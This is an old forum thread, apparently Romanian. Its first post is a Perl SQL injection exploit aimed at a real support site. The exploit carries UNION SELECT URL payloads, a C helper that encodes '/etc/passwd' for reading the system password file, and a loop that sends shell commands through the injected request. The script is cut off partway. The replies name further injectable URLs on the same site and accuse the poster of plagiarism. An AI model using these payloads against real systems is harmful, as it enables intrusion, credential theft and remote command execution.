fl0 fl0w Posted July 24, 2007 Report Posted July 24, 2007 #!/usr/bin/perl#You can get admin hash,or acces the pass file from the *NIx#with the generated strings with the generator.c program#you have to put in sql specific comands,my example is for#tables and *NIX pass#exploit tested on winxp sp2# #include<stdio.h># #include<stdlib.h># #include<string.h># int main()# { char st[1024];# int le;# printf("Input : ");# gets(st);# for(le=0;le<strlen(st);le++)# { printf("%d,",st[le]);# } # system("pause");# return 0;# }#101,116,99,47,112,97,115,115,119,100 = /etc/passwd#If we would do this :#http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/*#we create 8 tables ,to see the result type :#-1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/*print "......Start.......\n";print ".................\n";print ". fl0 fl0w .\n";print ". found by fl0w fl0w\n";print ". c0ded by fl0 fl0w\n";print ".......Email me at flo[underscore]flow[underscore]supremacy[dot]com\n\n";print ".................\n\n";use LWP::UserAgent;$site=@ARGV[0];$shells=@ARGV[1];$shellcmd=@ARGV[2]; if($site!~/http:\/\// || $site!~/http:\/\// || !$shells) { routine() }header();while() { print"[shell] \$"; while(<STDIN>){ $cmd=$_; chomp($cmd);$sploit=LWP::UserAgent->new() or die;$requesting=HTTP::Request->new(GET=>$site.'/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/*'.$shells.'?&'.$shellcmd.'='.$cmd) or die"\n\n NOT CONNECTED\n";$re=$sploit->request(requesting);$i=$re->content;$i=~tr/[\n]/[ Quote
kw3rln Posted July 24, 2007 Report Posted July 24, 2007 Doamne .. stii ce-ai scris p`acolo? Intelegi ce-ai facut? explica-mi si mie ce face sql injection ala ca-s curios .pe langa ca pagina ii plina de sql injection: http://support.jgaa.com/index.php?cmd=ShowProduct&ID=513'si de unde ai copiat codu la exploit:http://www.vivelinux.org/exploits/2260macar nu-l pune ca tu l-ai scrissi is 9 tabele nu 8 cum ai zis tu.. ai uitat sa numeri si 0 Quote
Guest flama Posted July 25, 2007 Report Posted July 25, 2007 o da miroase a flame ... ma bag shi eu hai flo floci raspunde de ce plagiezi Quote
